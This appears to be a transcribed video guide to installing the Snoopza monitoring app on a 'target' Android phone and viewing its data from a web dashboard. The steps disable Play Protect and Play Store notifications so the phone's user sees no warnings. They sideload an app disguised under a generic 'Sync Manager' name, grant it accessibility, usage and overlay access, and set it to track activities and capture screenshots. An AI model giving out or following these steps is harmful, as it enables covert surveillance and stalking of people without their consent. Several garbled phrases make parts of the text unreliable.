This guide shows you how to install the Snoopza app on your Android device. The Snoopza app must be installed on the target device. Open your target Android phone to make sure it is charged, unlocked, and connected to the internet, Wi-Fi or mobile data. In this segment, we'll focus on disabling Play Protect. To prevent Android warning messages from being displayed on the screen of the monitored device, you need to disable this functionality in Play Protect. Go to Play Store, open it, and press the account symbol in the upper right corner. Tap on the menu button and select Play Protect. Press the gear symbol in the upper right corner and deactivate Skin apps with Play Protect. Finally, tap Turn Off. Next, steep Disable Notifications Google Play Store. Click on the Play Store icon and hold until an additional menu appears. Press the I key. Tap on Notifications. Turn off the switch All Notifications. Now, let's move on to downloading the Snoopza installer. First, open your browser, preferably Chrome. Type in the link www.snoopza.com and press Go. Once on the site, enter any email and password and click Create a free account. If you're installing Snoopza on another device, watch the video at the link in the tip. If you're installing the app on your device, copy the installation address by clicking on the button next to the link. Then, paste this link address in the bar of your internet browser and click Go. In this segment, we'll delve into the installation process. Press Open. If prompted, tap Settings to allow installation. Navigate to Settings, then Allow from this source. Now, tap Install. Press Open. When the message Allow Sync Service to send you notifications appears, press Done to allow. Press the Next button. Accept the legal terms when prompted. Next, turn on Disable App Notifications. It's crucial to ensure the app runs smoothly without interruptions. Turn on Accessibility Service. Tap Installed or Downloaded apps. Tap Sync Manager. If the system displays a restricted setting warning message, you need to give permission for the application to continue the installation. Tap the System Back button. Enable the Accessibility Service again. Read the help and click OK. Find and open Sync Manager in the list. Next, click on the three dots located in the upper right corner. Tap the Allow Restricted Settings. Press Back button. Enable the Accessibility Service again. Tap Sync Manager. Turn on the switch. Press Allow. Tap the System Back button. Press Back button. Now to turn on Access to Usage. Activate the switch on the Access to Usage. Next, turn on the Overlay permission by activating the switch. If the Service Sync Service is not found, search for Sync Service in the list and turn on the switch. Activate the switch on the Disable Battery Optimization. Press Allow. Press the Next button. Now it is time to activate the Snoopza app. Enter your Snoopza account email and password. Next, choose Activities to track. Turn on the activities you want to track. Tap while using the app or allow confirming permissions. Press Next. Then select Additional Activities to track and tap Next. Next, select the types of screenshots you want to record. Press Start Now and tap Next. Finally, set up your PIN. Set the PIN code to enter the application and memorize it. Congratulations, installation completed. To enter the Snoopza dashboard on the device, open your internet browser, go to the Snoopza website, and log in. In 5 to 6 minutes, information from the device will show up in your Snoopza account. Your web account will now be accessible from any laptop, tablet, or computer connected to the internet.